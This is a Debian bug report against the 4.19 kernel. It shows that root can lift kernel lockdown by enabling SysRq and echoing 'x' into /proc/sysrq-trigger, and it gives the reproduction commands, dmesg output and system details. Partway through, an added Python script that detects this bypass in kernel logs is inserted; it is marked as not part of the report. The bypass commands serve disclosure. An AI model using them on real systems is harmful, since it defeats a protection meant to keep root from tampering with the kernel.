Bug#947021: linux-image-4.19.0-6-amd64: root can lift kernel lockdown
Package: src:linux
Version: 4.19.67-2+deb10u2
Severity: normal
Dear Maintainer,
Echoing "x" into /proc/sysrq-trigger disables kernel lockdown, even though it shouldn't.
Kernel lockdown is meant to create a barrier between root and the kernel that can only be broken with physical access to the system.
But a bug in debian/patches/features/all/lockdown/0002-Add-a-SysRq-option-to-lift-kernel-lockdown.patch allows root to easily circumvent this security measure:
vagrant@buster:~$ cat /proc/cmdline
BOOT_IMAGE=/boot/vmlinuz-4.19.0-6-amd64 root=UUID=b9ffc3d1-86b2-4a2c-a8be-f2b2f4aa4cb5 ro net.ifnames=0 quiet lockdown
vagrant@buster:~$ sudo dmesg | grep locked
[ 0.000000] Kernel is locked down from command line; see https://wiki.debian.org/SecureBoot
vagrant@buster:~$ sudo sysctl kernel.sysrq=1
kernel.sysrq = 1
vagrant@buster:~$ sudo sh -c "echo x > /proc/sysrq-trigger"
vagrant@buster:~$ sudo dmesg | tail
[ 3.050592] vboxvideo 0000:00:02.0: fb0: vboxdrmfb frame buffer device
[ 3.068268] [drm] Initialized vboxvideo 1.0.0 20130823 for 0000:00:02.0 on minor 0
[ 3.183323] IPv6: ADDRCONF(NETDEV_UP): eth0: link is not ready
[ 3.223529] Adding 1045500k swap on /dev/sda5. Priority:-2 extents:1 across:1045500k FS
[ 5.200670] e1000: eth0 NIC Link is Up 1000 Mbps Full Duplex, Flow Control: RX
[ 5.201533] IPv6: ADDRCONF(NETDEV_CHANGE): eth0: link becomes ready
[ 42.660726] sysrq: SysRq :
[ 42.660728] This sysrq operation is disabled from userspace.
[ 42.660797] Disabling Secure Boot restrictions
[ 42.660830] Lifting lockdown
I already reported this bug to Ubuntu at https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1851380
but it also affects Debian. (There's a bit more context and a patch in that bug report.)
Looking at the patch on salsa I think that this bug doesn't just exist in Buster, but that's the version I used to test it.
Best regards,
Niklas Sombert
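As an added defender-side check (not from the bug report or the Debian kernel), the following Python script scans dmesg output for the "Lifting lockdown" signature shown above and flags the permissive kernel.sysrq=1 setting the reporter needed to reproduce; the sample log lines are constructed from the report's output, and the function names and the one-second lookback window are assumptions of this example.

```python
import re
from typing import List, Tuple

# Kernel log signatures copied from the report above.
SYSRQ_DENIED = "This sysrq operation is disabled from userspace"
LIFTED = "Lifting lockdown"
DMESG_LINE = re.compile(r"^\[\s*(\d+\.\d+)\]\s*(.*)$")

# Constructed sample input: the relevant dmesg lines from the report.
SAMPLE_DMESG = """\
[    0.000000] Kernel is locked down from command line; see https://wiki.debian.org/SecureBoot
[    2.208030] Lockdown: BPF is restricted; see https://wiki.debian.org/SecureBoot
[   42.660726] sysrq: SysRq :
[   42.660728] This sysrq operation is disabled from userspace.
[   42.660797] Disabling Secure Boot restrictions
[   42.660830] Lifting lockdown
"""


def parse_dmesg(text: str) -> List[Tuple[float, str]]:
    """Split dmesg output into (timestamp, message) pairs, skipping odd lines."""
    events = []
    for line in text.splitlines():
        m = DMESG_LINE.match(line)
        if m:
            events.append((float(m.group(1)), m.group(2)))
    return events


def audit_lockdown(dmesg: str, sysrq_mask: int) -> List[str]:
    """Return findings in log order; an empty list means nothing suspicious."""
    findings = []
    if sysrq_mask == 1:
        findings.append("kernel.sysrq=1 enables every SysRq function")
    events = parse_dmesg(dmesg)
    for i, (ts, msg) in enumerate(events):
        if LIFTED not in msg:
            continue
        # Assumed 1-second window: in the report the 'disabled from userspace'
        # message precedes the lift by microseconds, i.e. it was logged, not enforced.
        denied = any(SYSRQ_DENIED in m for t, m in events[:i] if ts - t <= 1.0)
        origin = "userspace /proc/sysrq-trigger" if denied else "unknown source"
        findings.append(f"lockdown lifted at {ts:.3f}s via {origin}")
    return findings


if __name__ == "__main__":
    for finding in audit_lockdown(SAMPLE_DMESG, 1):
        print("FINDING:", finding)
```

On a live system feed it `dmesg` output and the value of `sysctl -n kernel.sysrq`; a "lifted ... via userspace" finding on a host booted with `lockdown` is the signature of this bug.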
-- Package-specific info:
** Version:
Linux version 4.19.0-6-amd64 (debian-kernel@lists.debian.org) (gcc version 8.3.0 (Debian 8.3.0-6)) #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11)
** Command line:
BOOT_IMAGE=/boot/vmlinuz-4.19.0-6-amd64 root=UUID=b9ffc3d1-86b2-4a2c-a8be-f2b2f4aa4cb5 ro net.ifnames=0 quiet lockdown
** Tainted: C (1024)
* Module from drivers/staging has been loaded.
** Kernel log:
[ 1.080252] Loading compiled-in X.509 certificates
[ 1.123039] Loaded X.509 cert 'Debian Secure Boot CA: 6ccece7e4c6c0d1f6149f3dd27dfcc5cbb419ea1'
[ 1.123062] Loaded X.509 cert 'Debian Secure Boot Signer: 00a7468def'
[ 1.123095] zswap: loaded using pool lzo/zbud
[ 1.123659] AppArmor: AppArmor sha1 policy hashing enabled
[ 1.124095] rtc_cmos rtc_cmos: setting system clock to 2019-12-19 14:23:08 UTC (1576765388)
[ 1.124123] Lockdown: Hibernation is restricted; see https://wiki.debian.org/SecureBoot
[ 1.125951] Freeing unused kernel image memory: 1584K
[ 1.148274] Write protecting the kernel read-only data: 16384k
[ 1.150291] Freeing unused kernel image memory: 2028K
[ 1.150967] Freeing unused kernel image memory: 772K
[ 1.165327] x86/mm: Checked W+X mappings: passed, no W+X pages found.
[ 1.165329] x86/mm: Checking user space page tables
[ 1.173508] x86/mm: Checked W+X mappings: passed, no W+X pages found.
[ 1.173511] Run /init as init process
[ 1.274579] piix4_smbus 0000:00:07.0: SMBus Host Controller at 0x4100, revision 0
[ 1.280038] e1000: Intel(R) PRO/1000 Network Driver - version 7.3.21-k8-NAPI
[ 1.280040] e1000: Copyright (c) 1999-2006 Intel Corporation.
[ 1.288044] SCSI subsystem initialized
[ 1.297356] FDC 0 is an 82078.
[ 1.306225] cryptd: max_cpu_qlen set to 1000
[ 1.317316] libata version 3.00 loaded.
[ 1.323785] ahci 0000:00:0d.0: version 3.0
[ 1.324687] ahci 0000:00:0d.0: SSS flag set, parallel bus scan disabled
[ 1.324882] ahci 0000:00:0d.0: AHCI 0001.0100 32 slots 1 ports 3 Gbps 0x1 impl SATA mode
[ 1.324884] ahci 0000:00:0d.0: flags: 64bit ncq stag only ccc
[ 1.325243] scsi host0: ahci
[ 1.325387] ata1: SATA max UDMA/133 abar m8192@0xf0804000 port 0xf0804100 irq 21
[ 1.336127] AVX2 version of gcm_enc/dec engaged.
[ 1.336128] AES CTR mode by8 optimization enabled
[ 1.553903] input: ImExPS/2 Generic Explorer Mouse as /devices/platform/i8042/serio1/input/input2
[ 1.647971] ata1: SATA link up 3.0 Gbps (SStatus 123 SControl 300)
[ 1.648249] ata1.00: ATA-6: VBOX HARDDISK, 1.0, max UDMA/133
[ 1.648253] ata1.00: 41533440 sectors, multi 128: LBA48 NCQ (depth 32)
[ 1.649141] ata1.00: configured for UDMA/133
[ 1.652372] scsi 0:0:0:0: Direct-Access ATA VBOX HARDDISK 1.0 PQ: 0 ANSI: 5
[ 1.661577] sd 0:0:0:0: [sda] 41533440 512-byte logical blocks: (21.3 GB/19.8 GiB)
[ 1.661585] sd 0:0:0:0: [sda] Write Protect is off
[ 1.661587] sd 0:0:0:0: [sda] Mode Sense: 00 3a 00 00
[ 1.661596] sd 0:0:0:0: [sda] Write cache: enabled, read cache: enabled, doesn't support DPO or FUA
[ 1.662652] sda: sda1 sda2 < sda5 >
[ 1.662960] sd 0:0:0:0: [sda] Attached SCSI disk
[ 1.726642] e1000 0000:00:03.0 eth0: (PCI:33MHz:32-bit) 08:00:27:8d:c0:4d
[ 1.726649] e1000 0000:00:03.0 eth0: Intel(R) PRO/1000 Network Connection
[ 1.925326] EXT4-fs (sda1): mounted filesystem with ordered data mode. Opts: (null)
[ 2.173566] systemd[1]: Inserted module 'autofs4'
[ 2.192803] systemd[1]: systemd 241 running in system mode. (+PAM +AUDIT +SELINUX +IMA +APPARMOR +SMACK +SYSVINIT +UTMP +LIBCRYPTSETUP +GCRYPT +GNUTLS +ACL +XZ +LZ4 +SECCOMP +BLKID +ELFUTILS +KMOD -IDN2 +IDN -PCRE2 default-hierarchy=hybrid)
[ 2.192854] systemd[1]: Detected virtualization oracle.
[ 2.192860] systemd[1]: Detected architecture x86-64.
[ 2.203626] systemd[1]: Set hostname to <buster>.
[ 2.204816] systemd[1]: Failed to bump fs.file-max, ignoring: Invalid argument
[ 2.208030] Lockdown: BPF is restricted; see https://wiki.debian.org/SecureBoot
[ 2.276511] systemd[1]: File /lib/systemd/system/systemd-journald.service:12 configures an IP firewall (IPAddressDeny=any), but the local system does not support BPF/cgroup based firewalling.
[ 2.276515] systemd[1]: Proceeding WITHOUT firewalling in effect! (This warning is only shown for the first loaded unit using IP firewalling.)
[ 2.341968] systemd[1]: Listening on udev Control Socket.
[ 2.350693] systemd[1]: Created slice system-getty.slice.
[ 2.350718] systemd[1]: Reached target Remote File Systems.
[ 2.437728] EXT4-fs (sda1): re-mounted. Opts: errors=remount-ro
[ 2.561461] systemd-journald[211]: Received request to flush runtime journal from PID 1
[ 2.716029] input: Power Button as /devices/LNXSYSTM:00/LNXPWRBN:00/input/input3
[ 2.717863] ACPI: Power Button [PWRF]
[ 2.718080] input: Sleep Button as /devices/LNXSYSTM:00/LNXSLPBN:00/input/input4
[ 2.718097] ACPI: Sleep Button [SLPF]
[ 2.730497] ACPI: AC Adapter [AC] (on-line)
[ 2.750810] battery: ACPI: Battery Slot [BAT0] (battery present)
[ 2.773327] ACPI: Video Device [GFX0] (multi-head: yes rom: no post: no)
[ 2.773420] input: Video Bus as /devices/LNXSYSTM:00/LNXSYBUS:00/PNP0A03:00/LNXVIDEO:00/input/input5
[ 2.779831] vboxguest: host-version: 5.2.34r133883 0x1
[ 2.781683] vbg_heartbeat_init: Setting up heartbeat to trigger every 2000 milliseconds
[ 2.781868] input: VirtualBox mouse integration as /devices/pci0000:00/0000:00:04.0/input/input6
[ 2.798688] vboxguest: misc device minor 58, IRQ 20, I/O port d020, MMIO at 0x00000000f0400000 (size 0x0000000000400000)
[ 2.817525] input: PC Speaker as /devices/platform/pcspkr/input/input7
[ 2.841065] sd 0:0:0:0: Attached scsi generic sg0 type 0
[ 2.869452] RAPL PMU: API unit is 2^-32 Joules, 4 fixed counters, 10737418240 ms ovfl timer
[ 2.869454] RAPL PMU: hw unit of domain pp0-core 2^-0 Joules
[ 2.869455] RAPL PMU: hw unit of domain package 2^-0 Joules
[ 2.869456] RAPL PMU: hw unit of domain dram 2^-0 Joules
[ 2.869456] RAPL PMU: hw unit of domain pp1-gpu 2^-0 Joules
[ 2.961287] audit: type=1400 audit(1576765390.336:2): apparmor="STATUS" operation="profile_load" profile="unconfined" name="nvidia_modprobe" pid=268 comm="apparmor_parser"
[ 2.961291] audit: type=1400 audit(1576765390.336:3): apparmor="STATUS" operation="profile_load" profile="unconfined" name="nvidia_modprobe//kmod" pid=268 comm="apparmor_parser"
[ 2.961650] audit: type=1400 audit(1576765390.336:4): apparmor="STATUS" operation="profile_load" profile="unconfined" name="/usr/bin/man" pid=267 comm="apparmor_parser"
[ 2.961652] audit: type=1400 audit(1576765390.336:5): apparmor="STATUS" operation="profile_load" profile="unconfined" name="man_filter" pid=267 comm="apparmor_parser"
[ 2.961654] audit: type=1400 audit(1576765390.336:6): apparmor="STATUS" operation="profile_load" profile="unconfined" name="man_groff" pid=267 comm="apparmor_parser"
[ 3.030128] vboxvideo: module is from the staging directory, the quality is unknown, you have been warned.
[ 3.036508] [drm] VRAM 00800000
[ 3.036740] [TTM] Zone kernel: Available graphics memory: 247382 kiB
[ 3.036741] [TTM] Initializing pool allocator
[ 3.036745] [TTM] Initializing DMA pool allocator
[ 3.039735] fbcon: vboxdrmfb (fb0) is primary device
[ 3.048398] Console: switching to colour frame buffer device 100x37
[ 3.050592] vboxvideo 0000:00:02.0: fb0: vboxdrmfb frame buffer device
[ 3.068268] [drm] Initialized vboxvideo 1.0.0 20130823 for 0000:00:02.0 on minor 0
[ 3.183323] IPv6: ADDRCONF(NETDEV_UP): eth0: link is not ready
[ 3.223529] Adding 1045500k swap on /dev/sda5. Priority:-2 extents:1 across:1045500k FS
[ 5.200670] e1000: eth0 NIC Link is Up 1000 Mbps Full Duplex, Flow Control: RX
[ 5.201533] IPv6: ADDRCONF(NETDEV_CHANGE): eth0: link becomes ready
[ 42.660726] sysrq: SysRq :
[ 42.660728] This sysrq operation is disabled from userspace.
[ 42.660797] Disabling Secure Boot restrictions
[ 42.660830] Lifting lockdown
** Model information
sys_vendor: innotek GmbH
product_name: VirtualBox
product_version: 1.2
chassis_vendor: Oracle Corporation
chassis_version:
bios_vendor: innotek GmbH
bios_version: VirtualBox
board_vendor: Oracle Corporation
board_name: VirtualBox
board_version: 1.2
** Loaded modules:
** PCI devices:
** USB devices:
not available
-- System Information:
Debian Release: 10.2
APT prefers stable
APT policy: (500, 'stable')
Architecture: amd64 (x86_64)
Kernel: Linux 4.19.0-6-amd64 (SMP w/2 CPU cores)
Kernel taint flags: TAINT_CRAP
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8), LANGUAGE=en_US.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /usr/bin/dash
Init: systemd (via /run/systemd/system)
LSM: AppArmor: enabled
Versions of packages linux-image-4.19.0-6-amd64 depends on:
ii initramfs-tools [linux-initramfs-tool] 0.133+deb10u1
ii kmod 26-1
ii linux-base 4.6
Versions of packages linux-image-4.19.0-6-amd64 recommends:
ii apparmor 2.13.2-10
ii firmware-linux-free 3.4
Versions of packages linux-image-4.19.0-6-amd64 suggests:
pn debian-kernel-handbook <none>
ii grub-pc 2.02+dfsg1-20
pn linux-doc-4.19 <none>
Versions of packages linux-image-4.19.0-6-amd64 is related to:
pn firmware-amd-graphics <none>
pn firmware-atheros <none>
pn firmware-bnx2 <none>
pn firmware-bnx2x <none>
pn firmware-brcm80211 <none>
pn firmware-cavium <none>
pn firmware-intel-sound <none>
pn firmware-intelwimax <none>
pn firmware-ipw2x00 <none>
pn firmware-ivtv <none>
pn firmware-iwlwifi <none>
pn firmware-libertas <none>
pn firmware-linux-nonfree <none>
pn firmware-misc-nonfree <none>
pn firmware-myricom <none>
pn firmware-netxen <none>
pn firmware-qlogic <none>
pn firmware-realtek <none>
pn firmware-samsung <none>
pn firmware-siano <none>
pn firmware-ti-connectivity <none>
pn xen-hypervisor <none>
-- no debconf information